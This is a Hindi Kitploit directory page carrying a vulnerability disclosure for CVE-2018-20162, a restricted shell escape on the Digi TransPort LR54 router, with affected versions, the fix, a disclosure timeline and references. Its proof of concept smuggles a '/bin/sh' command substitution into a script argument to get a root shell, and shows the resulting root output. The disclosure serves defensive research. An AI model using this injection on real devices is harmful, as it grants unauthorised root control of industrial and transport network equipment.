Skip to content
KitploitKITPLOIT
उपकरणब्लॉग
जमा करें
उपकरणब्लॉग
जमा करें

हैकिंग, पेनटेस्ट और साइबर सुरक्षा उपकरण आपके सुरक्षा शस्त्रागार के लिए!

Kitploit हैकिंग, साइबर सुरक्षा और पेंटेस्टिंग टूल्स की एक निर्देशिका है। कमजोरियों को खोजने, सिस्टम का विश्लेषण करने, परीक्षण को स्वचालित करने और अपनी सुरक्षा को मजबूत करने के लिए नवीनतम प्रोजेक्ट अपडेट खोजें।

··फ़ीड·संपर्क·गोपनीयता·© 2026 Kitploit

टूल निर्देशिका

श्रेणियाँ

सभी श्रेणियाँ देखें
Loading categories
CVE-2018-20162-digi-lr54-restricted-shell-escape | Kitploit
उपकरण/GitHubGitHub/stigtsp/cve-2018-20162-digi-lr54-restricted-shell-escape
एम्बेडेड सिस्टम सुरक्षाविशेषाधिकार वृद्धिIoT सुरक्षाभेद्यता विश्लेषणशोषणपेनिट्रेशन टेस्टिंगहार्डवेयर और IoT सुरक्षारेड टीमिंग

सबसे लोकप्रिय

सभी देखें →

हमारे समुदाय द्वारा सबसे अधिक उपयोग किए जाने वाले उपकरण खोजें।

सभी उपकरण खोजें

हमारे उपकरणों का संग्रह ब्राउज़ करें

सभी उपकरण देखें →
साझा करें
GitHub
stigtsp/cve-2018-20162-digi-lr54-restricted-shell-escape

CVE-2018-20162-digi-lr54-restricted-shell-escape

रिपॉजिटरी देखें
27 साल पहलेअभी तक समीक्षित नहीं

layout: post title: "CVE-2018-20162: Digi TransPort LR54 प्रतिबंधित शेल एस्केप" author: sgo category: security

Digi TransPort LR54 एक हाई-स्पीड LTE राउटर है जिसका उपयोग आमतौर पर उद्योग, अवसंरचना, खुदरा और सार्वजनिक परिवहन में किया जाता है।

यह एक प्रतिबंधित सैंडबॉक्स में पायथन स्क्रिप्ट चलाने का समर्थन करता है, और SSH पर सुलभ एक कस्टम शेल है जो समान प्रतिबंधों के अधीन है। अंतर्निहित OS इसलिए प्रशासक के लिए दुर्गम है।

मैंने सैंडबॉक्स से बाहर निकलने और रूट शेल प्राप्त करने का एक तरीका खोजा है, जो पायथन स्क्रिप्ट निष्पादित करते समय cli द्वारा कमांड लाइन आर्गुमेंट्स को संभालने के तरीके का शोषण करता है:

जब एक इंटरैक्टिव पायथन प्रक्रिया SIGINT (CTRL-C के माध्यम से) प्राप्त करती है, तो स्क्रिप्ट के आर्गुमेंट्स को इंटरैक्टिव CLI के त्रुटि लॉगिंग हैंडलर में पास करते समय ठीक से एस्केप नहीं किया जाता है। यह एक हमलावर को रूट के रूप में मनमाने कमांड निष्पादित करने की अनुमति देता है।

इस भेद्यता का शोषण करने के लिए, एक हमलावर के पास 'सुपर' विशेषाधिकारों के साथ इंटरैक्टिव CLI पहुँच होनी चाहिए। इस एक्सेस स्तर वाला उपयोगकर्ता डिवाइस पर डिफ़ॉल्ट रूप से सक्षम होता है।

असुरक्षित

Digi Transport LR54 (और संभवतः संबंधित उत्पाद जैसे WR64 और WR54)

फर्मवेयर संस्करण : 4.4.0.26 10/29/2018 21:14:06 फर्मवेयर संस्करण : 4.3.2.24 09/06/2018 00:58:34

और शायद पुराने संस्करण भी

शमन

उपयोगकर्ताओं को फर्मवेयर संस्करण 4.5.1.4 या उससे नए संस्करण में अपग्रेड करना चाहिए। डिवाइस पर संग्रहीत रहस्य, जैसे निजी कुंजियाँ और पासफ्रेज़, सावधानी के रूप में बदल दिए जाने चाहिए।

प्रूफ ऑफ कॉन्सेप्ट

  1. sleep.py को scp या sftp का उपयोग करके LR54 पर अपलोड करें, जिसमें निम्नलिखित हो:
root@kitploit:~
import time;time.sleep(10)
  1. LR54 cli में निम्नलिखित कमांड निष्पादित करें:
root@kitploit:~
python sleep.py --XXX $(/bin/sh -i >&2)
  1. प्रोग्राम शुरू होने के तुरंत बाद CTRL-C दबाएँ

  2. फिर आप एक इंटरैक्टिव रूट शेल में पहुँच जाते हैं

root@kitploit:~
/home/digi/user # uname -a
Linux (none) 3.10.14 #1 SMP Mon Oct 29 16:18:10 CDT 2018 mips GNU/Linux
/home/digi/user # id
uid=0(root) gid=2000(users_rw) groups=2000(users_rw),2002(users_super)

समयरेखा

  • 2018-12-13: भेद्यता की खोज की गई
  • 2018-12-14: PoC तैयार किया गया, विक्रेता को सूचित किया गया
  • 2018-12-14: विक्रेता ने पुष्टि की, 60 दिन का प्रतिबंध। CVE के लिए आवेदन किया गया।
  • 2018-12-15: CVE-2018-20162 आवंटित किया गया
  • 2018-12-31: प्री-रिलीज़ फर्मवेयर प्राप्त हुआ। असुरक्षित नहीं होने की पुष्टि की गई।
  • 2019-01-02: विक्रेता ने फिक्स्ड फर्मवेयर 4.5.1.4 जारी किया
  • 2019-01-25: विक्रेता ने CVE-2018-20162 का संदर्भ देने के लिए रिलीज़ नोट्स अपडेट किए
  • 2019-02-13: विक्रेता ने प्रकटीकरण को मंज़ूरी दी, प्रतिबंध हटा लिया गया

संदर्भ

  • https://www.digi.com/products/networking/cellular-routers/digi-transport-lr54
  • http://ftp1.digi.com/support/firmware/transport/LR54/v4.5.1.4/93001306_L.pdf
  • https://www.digi.com/resources/security
  • https://blog.hackeriet.no/cve-2018-20162-digi-lr54-restricted-shell-escape
  • https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-20162

श्रेय

भेद्यता की खोज Stig Palmquist ने की।

इस रिपोर्ट की समीक्षा के लिए @duniel_pls और @alexanderkjall को धन्यवाद।

टूल डाउनलोड करें